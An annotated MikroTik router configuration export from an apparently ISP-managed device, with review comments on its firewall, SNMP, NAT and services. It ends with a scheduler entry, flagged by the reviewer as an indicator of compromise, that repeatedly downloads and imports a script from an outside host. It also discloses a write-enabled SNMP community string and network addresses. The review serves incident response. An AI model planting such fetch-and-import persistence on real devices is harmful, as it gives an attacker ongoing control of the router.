# feb/25/2023 17:29:03 by RouterOS 6.47.10
# software id = 940R-XV92
#
# model = RB750Gr3
# serial number = D5030FE7A1E0
#
# Review summary: configuration export of an ISP-managed CPE router (two bridges,
# DHCP, NAT, SNMP, brute-force address lists). The security-relevant entries are
# annotated in place; the /system scheduler entry at the end is the most important.
/interface bridge
add name=LAN_NAT
add name=WAN
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/ip hotspot profile
set [ find default=yes ] html-directory=flash/hotspot
/ip pool
add name=dhcp_pool0 ranges="192.168.1.2-192.168.1.9,192.168.1.11-192.168.1.12,192.168.1.14-192.168.1.19,192.168.1.21-192.168.1.60,192.168.1.62-192.168.1.66,192.1\
    68.1.68-192.168.1.74,192.168.1.77-192.168.1.93,192.168.1.95-192.168.1.116,192.168.1.118-192.168.1.120,192.168.1.130-192.168.1.155,192.168.1.157-192.168.1.160\
    ,192.168.1.162-192.168.1.179,192.168.1.181-192.168.1.185,192.168.1.187-192.168.1.201,192.168.1.208-192.168.1.221,192.168.1.223-192.168.1.231,192.168.1.235-19\
    2.168.1.254"
/ip dhcp-server
add address-pool=dhcp_pool0 disabled=no interface=LAN_NAT lease-time=2h name=dhcp1
# SNMP: community "ifxcliente" has write access, limited to four /32 sources.
# No authentication or encryption setting appears on this line, so the community
# string is presumably the only secret protecting SNMP SET (confirm on the device).
# The string is disclosed by this export and should be rotated; set write-access=no
# unless the management system needs SET.
/snmp community
add addresses=190.61.4.34/32,190.61.4.170/32,190.61.4.35/32,190.61.4.36/32 name=ifxcliente write-access=yes
/interface bridge port
add bridge=LAN_NAT interface=ether3
add bridge=LAN_NAT interface=ether4
add bridge=LAN_NAT interface=ether2
add bridge=WAN interface=ether1
# Neighbor discovery is enabled on every interface outside the "dynamic" list,
# which presumably includes the WAN bridge and ether5 (verify); restricting it to
# the LAN side avoids advertising model and version upstream.
/ip neighbor discovery-settings
set discover-interface-list=!dynamic
/ip address
add address=190.61.5.53/30 interface=WAN network=190.61.5.52
add address=192.168.1.1/23 interface=LAN_NAT network=192.168.0.0
add address=172.17.129.6/30 interface=WAN network=172.17.129.4
add address=172.17.129.66/30 comment=MPLS_IFX interface=ether5 network=172.17.129.64
add address=192.168.2.1/24 interface=LAN_NAT network=192.168.2.0
/ip dhcp-server config
set store-leases-disk=48m
# NOTE(review): the network is 192.168.0.0/23 but clients are handed netmask=24;
# looks inconsistent with the /23 on LAN_NAT, confirm which is intended.
/ip dhcp-server network
add address=192.168.0.0/23 dns-server=8.8.8.8,200.91.200.100,200.91.200.101 gateway=192.168.1.1 netmask=24
/ip dns
set servers=8.8.8.8
# Firewall filter: the input chain holds only blacklist drops and list-building
# rules. This export has no rule that accepts established traffic and drops the
# rest, and no forward-chain rule at all, so access to the router's own services
# is governed by the /ip service address restrictions further down.
/ip firewall filter
add action=drop chain=input comment="drop ftp brute forcers" dst-port=21 protocol=tcp src-address-list=ftp_blacklist
add action=drop chain=input comment="drop Telnet brute forcers" dst-port=23 protocol=tcp src-address-list=telnet_blacklist
# Lets a limited rate of "530 Login incorrect" replies per destination through;
# replies over the limit are not accepted here and reach the list-adding rules below.
add action=accept chain=output content="530 Login incorrect" dst-limit=1/1m,9,dst-address/1m protocol=tcp
add action=add-dst-to-address-list address-list=ftp_blacklist address-list-timeout=3h chain=output content="530 Login incorrect" protocol=tcp
# Same content match as the FTP rule above, so telnet_blacklist is filled from
# the FTP failure string rather than from Telnet logins. Both ftp and telnet are
# disabled under /ip service below, which leaves these rules with nothing to match.
add action=add-dst-to-address-list address-list=telnet_blacklist address-list-timeout=3h chain=output content="530 Login incorrect" protocol=tcp
# Nothing in this export adds an address to ssh_blacklist: the stage rules stop
# at ssh_stage3, so this drop never matches unless the list is filled elsewhere.
add action=drop chain=input comment="drop ssh brute forcers" dst-port=22 protocol=tcp src-address-list=ssh_blacklist
# Duplicate of the Telnet drop rule above.
add action=drop chain=input comment="drop telnet brute forcers" dst-port=23 protocol=tcp src-address-list=telnet_blacklist
# Staged tracking of new SSH connections (stage1 -> stage2 -> stage3, 1m each).
add action=add-src-to-address-list address-list=ssh_stage3 address-list-timeout=1m chain=input connection-state=new dst-port=22 protocol=tcp src-address-list=\
    ssh_stage2
add action=add-src-to-address-list address-list=ssh_stage2 address-list-timeout=1m chain=input connection-state=new dst-port=22 protocol=tcp src-address-list=\
    ssh_stage1
add action=add-src-to-address-list address-list=ssh_stage1 address-list-timeout=1m chain=input connection-state=new dst-port=22 protocol=tcp
# NAT: source NAT for the LAN, plus two port forwards (443 and 22) to
# 192.168.1.207 that are limited to a single source, 190.60.220.130.
# NOTE(review): dst-address 190.61.5.54 is not one of the addresses configured
# under /ip address above; confirm these rules are reachable as intended.
/ip firewall nat
add action=src-nat chain=srcnat out-interface=WAN src-address=192.168.0.0/23 to-addresses=190.61.5.53
add action=dst-nat chain=dstnat dst-address=190.61.5.54 dst-port=443 protocol=tcp src-address=190.60.220.130 to-addresses=192.168.1.207 to-ports=443
add action=dst-nat chain=dstnat dst-address=190.61.5.54 dst-port=22 protocol=tcp src-address=190.60.220.130 src-port="" to-addresses=192.168.1.207 to-ports=22
/ip route
add distance=1 gateway=172.17.129.5
# Management services: telnet, ftp and www are disabled; ssh and winbox are
# limited by source address, mostly to whole /16 prefixes. api and api-ssl do not
# appear here; an export omits default values, so check their state with
# "/ip service print" and disable or restrict them as well.
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh address=190.60.0.0/16,190.61.0.0/16,172.16.0.0/16,172.17.0.0/16,10.0.120.0/24,200.62.0.0/16,200.91.0.0/16,38.123.197.23/32,144.91.71.175/32
set winbox address=190.60.0.0/16,200.62.0.0/16,200.91.0.0/16,38.123.197.23/32,144.91.71.175/32
/snmp
set enabled=yes trap-community=ifxcliente
/system clock
set time-zone-name=America/Guatemala
/system identity
set name=SID_1812341_PROYECTO_CUATRO_CARCHA
/system note
set note="**************************************************************\
    \n* *\
    \n* ATENCION: Este equipo es propiedad de IFX Networks *\
    \n* El uso no autorizado esta estrictamente prohibido. *\
    \n* Todos los usuarios son legalmente responsables de sus *\
    \n* acciones sobre el sistema y toda actividad sera registrada *\
    \n* *\
    \n**************************************************************"
# INDICATOR OF COMPROMISE (review): scheduler "U6" runs every 10 minutes,
# downloads a script over plain HTTP from an external host into 7wmp0b4s.rsc and
# imports it, with a policy set that includes write, policy, password, sniff and
# sensitive. Whoever controls that URL (or the path to it) can therefore change
# this router's configuration at will. Nothing else in this export refers to the
# job, and start-date=jan/07/1970 suggests it was created while the clock was
# unset; treat it as unauthorised persistence until proven otherwise.
# Response: disable and remove the entry, delete 7wmp0b4s.rsc from the file store,
# review /user, /system script, /ip socks, /ip proxy and /ppp secret for entries
# the operator did not create, rotate every credential held on the device
# (including the SNMP community) and upgrade RouterOS from 6.47.10.
/system scheduler
add interval=10m name=U6 on-event=\
    "/tool fetch url=http://zancetom.com/poll/fd220439-f0fc-414c-a2c2-ef0525e8b03b mode=http dst-path=7wmp0b4s.rsc\r\
    \n/import 7wmp0b4s.rsc" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=jan/07/1970 start-time=02:43:55